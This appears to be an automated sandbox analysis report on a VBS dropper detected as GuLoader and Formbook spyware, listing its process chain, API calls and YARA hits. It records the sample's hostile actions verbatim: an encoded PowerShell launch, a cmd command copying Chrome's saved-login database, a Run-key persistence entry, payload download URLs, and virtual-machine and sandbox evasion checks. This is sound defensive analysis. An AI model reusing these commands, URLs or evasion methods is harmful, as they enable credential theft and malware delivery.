      Source: 00000016.00000000.558838756.0000000006624000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: String function: 1ED0B150 appears 35 times
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: String function: 047DB150 appears 54 times
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED496E0 NtFreeVirtualMemory,LdrInitializeThunk,18_2_1ED496E0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED49660 NtAllocateVirtualMemory,LdrInitializeThunk,18_2_1ED49660
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED49780 NtMapViewOfSection,LdrInitializeThunk,18_2_1ED49780
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED497A0 NtUnmapViewOfSection,LdrInitializeThunk,18_2_1ED497A0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED49710 NtQueryInformationToken,LdrInitializeThunk,18_2_1ED49710
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED49540 NtReadFile,LdrInitializeThunk,18_2_1ED49540
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED49A50 NtCreateFile,LdrInitializeThunk,18_2_1ED49A50
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED49A00 NtProtectVirtualMemory,LdrInitializeThunk,18_2_1ED49A00
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED49A20 NtResumeThread,LdrInitializeThunk,18_2_1ED49A20
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED498F0 NtReadVirtualMemory,LdrInitializeThunk,18_2_1ED498F0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED49840 NtDelayExecution,LdrInitializeThunk,18_2_1ED49840
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED49860 NtQuerySystemInformation,LdrInitializeThunk,18_2_1ED49860
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED499A0 NtCreateSection,LdrInitializeThunk,18_2_1ED499A0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED49910 NtAdjustPrivilegesToken,LdrInitializeThunk,18_2_1ED49910
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED496D0 NtCreateKey,18_2_1ED496D0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED49650 NtQueryValueKey,18_2_1ED49650
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED49670 NtQueryInformationProcess,18_2_1ED49670
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED49610 NtEnumerateValueKey,18_2_1ED49610
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED49FE0 NtCreateMutant,18_2_1ED49FE0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED4A770 NtOpenThread,18_2_1ED4A770
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED49770 NtSetInformationFile,18_2_1ED49770
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED49760 NtOpenProcess,18_2_1ED49760
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED4A710 NtOpenProcessToken,18_2_1ED4A710
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED49730 NtQueryVirtualMemory,18_2_1ED49730
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED495D0 NtClose,18_2_1ED495D0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED495F0 NtQueryInformationFile,18_2_1ED495F0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED49560 NtWriteFile,18_2_1ED49560
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED4AD30 NtSetContextThread,18_2_1ED4AD30
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED49520 NtWaitForSingleObject,18_2_1ED49520
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED49A80 NtOpenDirectoryObject,18_2_1ED49A80
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED49A10 NtQuerySection,18_2_1ED49A10
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED4A3B0 NtGetContextThread,18_2_1ED4A3B0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED49B00 NtSetValueKey,18_2_1ED49B00
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED498A0 NtWriteVirtualMemory,18_2_1ED498A0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED4B040 NtSuspendThread,18_2_1ED4B040
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED49820 NtEnumerateKey,18_2_1ED49820
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED499D0 NtCreateProcessEx,18_2_1ED499D0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED49950 NtQueueApcThread,18_2_1ED49950
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_048195D0 NtClose,LdrInitializeThunk,27_2_048195D0
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_04819540 NtReadFile,LdrInitializeThunk,27_2_04819540
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_04819560 NtWriteFile,LdrInitializeThunk,27_2_04819560
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_048196D0 NtCreateKey,LdrInitializeThunk,27_2_048196D0
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_048196E0 NtFreeVirtualMemory,LdrInitializeThunk,27_2_048196E0
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_04819610 NtEnumerateValueKey,LdrInitializeThunk,27_2_04819610
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_04819650 NtQueryValueKey,LdrInitializeThunk,27_2_04819650
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_04819660 NtAllocateVirtualMemory,LdrInitializeThunk,27_2_04819660
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_04819780 NtMapViewOfSection,LdrInitializeThunk,27_2_04819780
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_04819FE0 NtCreateMutant,LdrInitializeThunk,27_2_04819FE0
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_04819710 NtQueryInformationToken,LdrInitializeThunk,27_2_04819710
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_04819770 NtSetInformationFile,LdrInitializeThunk,27_2_04819770
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_04819840 NtDelayExecution,LdrInitializeThunk,27_2_04819840
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_04819860 NtQuerySystemInformation,LdrInitializeThunk,27_2_04819860
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_048199A0 NtCreateSection,LdrInitializeThunk,27_2_048199A0
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_04819910 NtAdjustPrivilegesToken,LdrInitializeThunk,27_2_04819910
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_04819A50 NtCreateFile,LdrInitializeThunk,27_2_04819A50
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_04819B00 NtSetValueKey,LdrInitializeThunk,27_2_04819B00
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_048195F0 NtQueryInformationFile,27_2_048195F0
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_04819520 NtWaitForSingleObject,27_2_04819520
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0481AD30 NtSetContextThread,27_2_0481AD30
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_04819670 NtQueryInformationProcess,27_2_04819670
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_048197A0 NtUnmapViewOfSection,27_2_048197A0
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0481A710 NtOpenProcessToken,27_2_0481A710
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_04819730 NtQueryVirtualMemory,27_2_04819730
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_04819760 NtOpenProcess,27_2_04819760
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0481A770 NtOpenThread,27_2_0481A770
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_048198A0 NtWriteVirtualMemory,27_2_048198A0
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_048198F0 NtReadVirtualMemory,27_2_048198F0
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_04819820 NtEnumerateKey,27_2_04819820
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0481B040 NtSuspendThread,27_2_0481B040
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_048199D0 NtCreateProcessEx,27_2_048199D0
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_04819950 NtQueueApcThread,27_2_04819950
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_04819A80 NtOpenDirectoryObject,27_2_04819A80
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_04819A00 NtProtectVirtualMemory,27_2_04819A00
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_04819A10 NtQuerySection,27_2_04819A10
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_04819A20 NtResumeThread,27_2_04819A20
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0481A3B0 NtGetContextThread,27_2_0481A3B0
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0064A370 NtCreateFile,27_2_0064A370
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0064A420 NtReadFile,27_2_0064A420
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0064A4A0 NtClose,27_2_0064A4A0
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0064A550 NtAllocateVirtualMemory,27_2_0064A550
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0064A36B NtCreateFile,27_2_0064A36B
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0064A41A NtReadFile,27_2_0064A41A
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0064A49A NtClose,27_2_0064A49A
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0064A54B NtAllocateVirtualMemory,27_2_0064A54B
      Source: MTIR22024323_0553381487_20220112120005.vbsInitial sample: Strings found which are bigger than 50
      Source: MTIR22024323_0553381487_20220112120005.vbsReversingLabs: Detection: 12%
      Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\MTIR22024323_0553381487_20220112120005.vbs"
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ej2xf2fu\ej2xf2fu.cmdline
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5835.tmp" "c:\Users\user\AppData\Local\Temp\ej2xf2fu\CSC2BA07324D1EB47AD834E18C884AF81E4.TMP"
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
      Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\autochk.exe C:\Windows\SysWOW64\autochk.exe
      Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exe
      Source: C:\Windows\SysWOW64\cmstp.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\explorer.exeProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe "C:\Program Files (x86)\internet explorer\ieinstal.exe"
      Source: C:\Windows\explorer.exeProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe "C:\Program Files (x86)\internet explorer\ieinstal.exe"
      Source: C:\Windows\SysWOW64\cmstp.exeProcess created: C:\Windows\explorer.exe "C:\Windows\explorer.exe" /LOADSAVEDWINDOWS
      Source: C:\Windows\SysWOW64\cmstp.exeProcess created: C:\Windows\explorer.exe "C:\Windows\explorer.exe" /LOADSAVEDWINDOWS
      Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Documents\20220113
      Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\FORSVARL.dat
      Source: classification engineClassification label: mal100.troj.spyw.evad.winVBS@25/17@2/2
      Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.ini
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6452:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5228:120:WilError_01
      Source: C:\Windows\SysWOW64\cmstp.exeFile written: C:\Users\user\AppData\Roaming\O118090C\O11logri.ini
      Source: C:\Windows\SysWOW64\cmstp.exeProcess created: C:\Windows\explorer.exe
      Source: C:\Windows\SysWOW64\cmstp.exeProcess created: C:\Windows\explorer.exe
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeFile read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeFile read: C:\Windows\System32\drivers\etc\hosts
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
      Source: C:\Windows\SysWOW64\cmstp.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
      Source: Binary string: cmstp.pdbGCTL source: ieinstal.exe, 00000012.00000002.602875581.00000000030F0000.00000040.00020000.sdmp
      Source: Binary string: ieinstal.pdbGCTL source: cmstp.exe, 0000001B.00000002.891641953.0000000004CDF000.00000004.00020000.sdmp, explorer.exe, 00000022.00000000.720341637.0000000006F9F000.00000004.00020000.sdmp
      Source: Binary string: ieinstal.pdb source: cmstp.exe, 0000001B.00000002.891641953.0000000004CDF000.00000004.00020000.sdmp, explorer.exe, 00000022.00000000.720341637.0000000006F9F000.00000004.00020000.sdmp
      Source: Binary string: wntdll.pdbUGP source: ieinstal.exe, 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp, ieinstal.exe, 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, cmstp.exe, 0000001B.00000002.890129561.00000000047B0000.00000040.00000001.sdmp, cmstp.exe, 0000001B.00000002.890664536.00000000048CF000.00000040.00000001.sdmp
      Source: Binary string: wntdll.pdb source: ieinstal.exe, ieinstal.exe, 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp, ieinstal.exe, 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, cmstp.exe, cmstp.exe, 0000001B.00000002.890129561.00000000047B0000.00000040.00000001.sdmp, cmstp.exe, 0000001B.00000002.890664536.00000000048CF000.00000040.00000001.sdmp
      Source: Binary string: cmstp.pdb source: ieinstal.exe, 00000012.00000002.602875581.00000000030F0000.00000040.00020000.sdmp

      Data Obfuscation:

      VBScript performs obfuscated calls to suspicious functions
      Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: ShellExecute("C:\Windows\SysWOW64\WindowsPowerShell\v", " -EncodedCommand "IwBSAHYAZQBuACAAUABBA", "", "", "0")
      Yara detected GuLoader
      Source: Yara matchFile source: 00000012.00000000.495265082.0000000002D00000.00000040.00000001.sdmp, type: MEMORY
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_0761CC11 push es; iretd 4_2_0761CC12
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_0761CC88 push es; iretd 4_2_0761CC8A
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_0761CC8B push es; iretd 4_2_0761CC92
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_07616930 push es; ret 4_2_07616940
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED5D0D1 push ecx; ret 18_2_1ED5D0E4
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0482D0D1 push ecx; ret 27_2_0482D0E4
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_006479E4 pushfd ; retf 27_2_006479E5
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_00647316 push ds; retf 27_2_00647318
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0064D4C5 push eax; ret 27_2_0064D518
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0064D57C push eax; ret 27_2_0064D582
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0064E517 push ss; ret 27_2_0064E518
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0064D512 push eax; ret 27_2_0064D518
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0064D51B push eax; ret 27_2_0064D582
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0064DE6D push dword ptr [ACFE0177h]; ret 27_2_0064DF57
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ej2xf2fu\ej2xf2fu.cmdline
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\ej2xf2fu\ej2xf2fu.dll
      Source: C:\Windows\SysWOW64\cmstp.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run KLQL6TZPVV
      Source: C:\Windows\System32\wscript.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\cmstp.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

      Malware Analysis System Evasion:

      Tries to detect Any.run
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Program Files\qga\qga.exe
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeFile opened: C:\Program Files\qga\qga.exe
      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
      Source: ieinstal.exe, 00000012.00000002.602935593.00000000031F0000.00000004.00000001.sdmpBinary or memory string: USER32NTDLLKERNEL32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNSTARTUP KEYHTTPS://WWW.WIZUMIYA.CO.JP/HTML/USER_DATA/ORIGINAL/IMAGES/BIN_WUOAIR166.BINHTTP://FAHRSCHULE-HELI.AT/BIN_WUOAIR166.BIN
      Source: powershell.exe, 00000004.00000002.562061021.00000000074C4000.00000004.00000001.sdmp, ieinstal.exe, 00000012.00000002.602935593.00000000031F0000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
      Tries to detect virtualization through RDTSC time measurements
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeRDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeRDTSC instruction interceptor: First address: 0000000000409B7E second address: 0000000000409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Windows\SysWOW64\cmstp.exeRDTSC instruction interceptor: First address: 0000000000639904 second address: 000000000063990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Windows\SysWOW64\cmstp.exeRDTSC instruction interceptor: First address: 0000000000639B7E second address: 0000000000639B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6644Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Windows\SysWOW64\cmstp.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ej2xf2fu\ej2xf2fu.dll
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED46DE6 rdtsc 18_2_1ED46DE6
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2992
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 666
      Source: C:\Windows\explorer.exeFile opened / queried: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#5&1ec51bf7&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeAPI coverage: 5.7 %
      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSystem information queried: ModuleInformation
      Source: explorer.exe, 00000022.00000003.711372871.0000000004AAB000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
      Source: explorer.exe, 00000016.00000000.534558987.00000000083E7000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
      Source: ieinstal.exe, 00000012.00000002.603127626.0000000004B0A000.00000004.00000001.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
      Source: explorer.exe, 00000022.00000003.711582257.0000000004BF0000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
      Source: explorer.exe, 00000022.00000003.722492029.0000000004CA9000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
      Source: explorer.exe, 00000022.00000003.719609820.0000000004BF0000.00000004.00000001.sdmpBinary or memory string: en_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Local
      Source: powershell.exe, 00000004.00000002.562061021.00000000074C4000.00000004.00000001.sdmp, ieinstal.exe, 00000012.00000002.602935593.00000000031F0000.00000004.00000001.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: explorer.exe, 00000022.00000003.726098821.0000000004BB9000.00000004.00000001.sdmpBinary or memory string: #{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&0000004*
      Source: powershell.exe, 00000004.00000002.554251303.0000000004776000.00000004.00000001.sdmpBinary or memory string: m:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
      Source: ieinstal.exe, 00000012.00000002.603127626.0000000004B0A000.00000004.00000001.sdmpBinary or memory string: Hyper-V Heartbeat Service
